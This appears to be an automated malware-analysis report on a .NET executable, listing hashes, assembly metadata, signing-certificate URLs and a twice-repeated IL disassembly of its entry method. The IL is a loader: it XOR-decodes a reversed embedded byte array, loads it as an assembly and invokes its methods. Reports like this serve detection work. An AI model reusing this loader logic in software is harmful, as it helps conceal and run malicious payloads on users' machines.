843e725eba3cd24a9bf3c6732d8de93f
PE Executable | MD5: 843e725eba3cd24a9bf3c6732d8de93f | Size: 2.47 MB | application/x-dosexec
Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 843e725eba3cd24a9bf3c6732d8de93f
|
| Sha1 | 34e4697ce05cf46373e7b7e3e537ded6d63e6fc8
|
| Sha256 | cb29310b5e68fa5f5c4aab781924807aea4f10e1d40164892cbf8651abf7bfd7
|
| Sha384 | b346ccd0b9d9a5bf46a6bae593c455d5073e0a79a04bbf9e3d6a8a68c866690852a1c57639f591fb0dac3788af1c1689
|
| Sha512 | 1026d70f274ae2179191373bd6660b57516b3aa4ef12c38b60269e86d448e1c71fd5b1864f2fcd3bc1bd64abfd542ed500f4fa1bfbe0a38214580853c985f495
|
| SSDeep | 49152:aPXSJg0byGrZYsVAB/Ktu8F0GtsRyQPil:aPXsg0bptVY/38K3e
|
| TLSH | 24B501353F8E6A44C27E6F389DB7A6340BB25E4BDD3AC35BA895314CB93374912A1701
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | Authenticode present at 0x257A00 size 18264 bytes |
| Module Name | Dg0cixZ |
| Full Name | Dg0cixZ |
| EntryPoint | System.Void Dg0cixZ.iz5PG::Wpw1m8iALg0rf() |
| Scope Name | Dg0cixZ |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Dg0cixZ |
| Assembly Version | 1.9.2.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.6 |
| Total Strings | 981 |
| Main Method | System.Void Dg0cixZ.iz5PG::Wpw1m8iALg0rf() |
| Main IL Instruction Count | 125 |
| Main IL | nop <null> nop <null> ldc.i4.s 20 call System.Void System.Threading.Thread::Sleep(System.Int32) nop <null> call System.Byte[] Dg0cixZ.ge0L4NjoTpw7::Ss3p6jpTxN() call System.Collections.Generic.IEnumerable`1<System.Byte> System.Linq.Enumerable::Reverse<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>) call System.Byte[] System.Linq.Enumerable::ToArray<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>) stloc.0 <null> ldloc.0 <null> ldlen <null> conv.i4 <null> ldc.i4.1 <null> sub.ovf <null> stloc.s V_4 ldc.i4.0 <null> stloc.s V_5 br.s IL_0049: ldloc.s V_5 ldloc.s V_5 ldc.i4.8 <null> rem <null> ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brfalse.s IL_0042: nop ldloc.0 <null> ldloc.s V_5 ldloc.0 <null> ldloc.s V_5 ldelem.u1 <null> ldc.i4 211 xor <null> stelem.i1 <null> nop <null> nop <null> ldloc.s V_5 ldc.i4.1 <null> add.ovf <null> stloc.s V_5 ldloc.s V_5 ldloc.s V_4 ble.s IL_0026: ldloc.s V_5 ldloc.0 <null> call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) stloc.1 <null> ldloc.1 <null> callvirt System.Type[] System.Reflection.Assembly::GetTypes() stloc.2 <null> ldloc.2 <null> ldlen <null> conv.i4 <null> ldc.i4.s 24 cgt <null> ldc.i4.0 <null> ceq <null> stloc.s V_7 ldloc.s V_7 brfalse.s IL_006F: ldloc.2 leave.s IL_00EA: ret ldloc.2 <null> ldc.i4.s 24 ldelem.ref <null> stloc.3 <null> ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_8 ldloc.s V_8 brfalse.s IL_0080: ldloc.3 leave.s IL_00EA: ret ldloc.3 <null> ldc.i4.s 56 callvirt System.Reflection.MethodInfo[] System.Type::GetMethods(System.Reflection.BindingFlags) stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 br.s IL_00CC: ldloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldelem.ref <null> stloc.s V_11 ldloc.s V_11 callvirt System.Reflection.ParameterInfo[] System.Reflection.MethodBase::GetParameters() ldlen <null> conv.i4 <null> ldc.i4.0 <null> ceq <null> stloc.s V_12 ldloc.s V_12 brfalse.s IL_00C4: nop nop <null> ldloc.s V_11 ldnull <null> ldnull <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_00C2: nop call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00C2: nop nop <null> nop <null> nop <null> nop <null> ldloc.s V_10 ldc.i4.1 <null> add.ovf <null> stloc.s V_10 ldloc.s V_10 ldloc.s V_9 ldlen <null> conv.i4 <null> clt <null> stloc.s V_13 ldloc.s V_13 brtrue.s IL_008F: ldloc.s V_9 leave.s IL_00E9: nop call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00E9: nop nop <null> ret <null> |
| Module Name | Dg0cixZ |
| Full Name | Dg0cixZ |
| EntryPoint | System.Void Dg0cixZ.iz5PG::Wpw1m8iALg0rf() |
| Scope Name | Dg0cixZ |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Dg0cixZ |
| Assembly Version | 1.9.2.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.6 |
| Total Strings | 981 |
| Main Method | System.Void Dg0cixZ.iz5PG::Wpw1m8iALg0rf() |
| Main IL Instruction Count | 125 |
| Main IL | nop <null> nop <null> ldc.i4.s 20 call System.Void System.Threading.Thread::Sleep(System.Int32) nop <null> call System.Byte[] Dg0cixZ.ge0L4NjoTpw7::Ss3p6jpTxN() call System.Collections.Generic.IEnumerable`1<System.Byte> System.Linq.Enumerable::Reverse<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>) call System.Byte[] System.Linq.Enumerable::ToArray<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>) stloc.0 <null> ldloc.0 <null> ldlen <null> conv.i4 <null> ldc.i4.1 <null> sub.ovf <null> stloc.s V_4 ldc.i4.0 <null> stloc.s V_5 br.s IL_0049: ldloc.s V_5 ldloc.s V_5 ldc.i4.8 <null> rem <null> ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brfalse.s IL_0042: nop ldloc.0 <null> ldloc.s V_5 ldloc.0 <null> ldloc.s V_5 ldelem.u1 <null> ldc.i4 211 xor <null> stelem.i1 <null> nop <null> nop <null> ldloc.s V_5 ldc.i4.1 <null> add.ovf <null> stloc.s V_5 ldloc.s V_5 ldloc.s V_4 ble.s IL_0026: ldloc.s V_5 ldloc.0 <null> call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) stloc.1 <null> ldloc.1 <null> callvirt System.Type[] System.Reflection.Assembly::GetTypes() stloc.2 <null> ldloc.2 <null> ldlen <null> conv.i4 <null> ldc.i4.s 24 cgt <null> ldc.i4.0 <null> ceq <null> stloc.s V_7 ldloc.s V_7 brfalse.s IL_006F: ldloc.2 leave.s IL_00EA: ret ldloc.2 <null> ldc.i4.s 24 ldelem.ref <null> stloc.3 <null> ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_8 ldloc.s V_8 brfalse.s IL_0080: ldloc.3 leave.s IL_00EA: ret ldloc.3 <null> ldc.i4.s 56 callvirt System.Reflection.MethodInfo[] System.Type::GetMethods(System.Reflection.BindingFlags) stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 br.s IL_00CC: ldloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldelem.ref <null> stloc.s V_11 ldloc.s V_11 callvirt System.Reflection.ParameterInfo[] System.Reflection.MethodBase::GetParameters() ldlen <null> conv.i4 <null> ldc.i4.0 <null> ceq <null> stloc.s V_12 ldloc.s V_12 brfalse.s IL_00C4: nop nop <null> ldloc.s V_11 ldnull <null> ldnull <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_00C2: nop call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00C2: nop nop <null> nop <null> nop <null> nop <null> ldloc.s V_10 ldc.i4.1 <null> add.ovf <null> stloc.s V_10 ldloc.s V_10 ldloc.s V_9 ldlen <null> conv.i4 <null> clt <null> stloc.s V_13 ldloc.s V_13 brtrue.s IL_008F: ldloc.s V_9 leave.s IL_00E9: nop call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00E9: nop nop <null> ret <null> |
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | https://certs.securetrust.com/CA0 |
| URLs in VB Code - #2 | http://crl.securetrust.com/TWGCSCA_L1.crl0y |
| URLs in VB Code - #3 | http://ocsp.securetrust.com/0 |
| URLs in VB Code - #4 | http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0 |
| URLs in VB Code - #5 | https://ssl.trustwave.com/CA03 |
| URLs in VB Code - #6 | http://crl.trustwave.com/TWGCA.crl0n |
| URLs in VB Code - #7 | http://ocsp.trustwave.com/06 |
| URLs in VB Code - #8 | http://ssl.trustwave.com/issuers/TWGCA.crt0 |
| URLs in VB Code - #9 | http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0 |
| URLs in VB Code - #10 | http://ocsp.vikingcloud.com/0A |
| URLs in VB Code - #11 | http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0 |
| URLs in VB Code - #12 | https://certs.securetrust.com/CA05 |
| URLs in VB Code - #13 | http://crl.vikingcloud.com/TWGCA.crl0t |
| URLs in VB Code - #14 | http://ocsp.vikingcloud.com/0 |
| URLs in VB Code - #15 | http://certs.securetrust.com/issuers/TWGCA.crt0 |
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | https://certs.securetrust.com/CA0 |
843e725eba3cd24a9bf3c6732d8de93f |
| URLs in VB Code - #2 | http://crl.securetrust.com/TWGCSCA_L1.crl0y |
843e725eba3cd24a9bf3c6732d8de93f |
| URLs in VB Code - #3 | http://ocsp.securetrust.com/0 |
843e725eba3cd24a9bf3c6732d8de93f |
| URLs in VB Code - #4 | http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0 |
843e725eba3cd24a9bf3c6732d8de93f |
| URLs in VB Code - #5 | https://ssl.trustwave.com/CA03 |
843e725eba3cd24a9bf3c6732d8de93f |
| URLs in VB Code - #6 | http://crl.trustwave.com/TWGCA.crl0n |
843e725eba3cd24a9bf3c6732d8de93f |
| URLs in VB Code - #7 | http://ocsp.trustwave.com/06 |
843e725eba3cd24a9bf3c6732d8de93f |
| URLs in VB Code - #8 | http://ssl.trustwave.com/issuers/TWGCA.crt0 |
843e725eba3cd24a9bf3c6732d8de93f |
| URLs in VB Code - #9 | http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0 |
843e725eba3cd24a9bf3c6732d8de93f |
| URLs in VB Code - #10 | http://ocsp.vikingcloud.com/0A |
843e725eba3cd24a9bf3c6732d8de93f |
| URLs in VB Code - #11 | http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0 |
843e725eba3cd24a9bf3c6732d8de93f |
| URLs in VB Code - #12 | https://certs.securetrust.com/CA05 |
843e725eba3cd24a9bf3c6732d8de93f |
| URLs in VB Code - #13 | http://crl.vikingcloud.com/TWGCA.crl0t |
843e725eba3cd24a9bf3c6732d8de93f |
| URLs in VB Code - #14 | http://ocsp.vikingcloud.com/0 |
843e725eba3cd24a9bf3c6732d8de93f |
| URLs in VB Code - #15 | http://certs.securetrust.com/issuers/TWGCA.crt0 |
843e725eba3cd24a9bf3c6732d8de93f |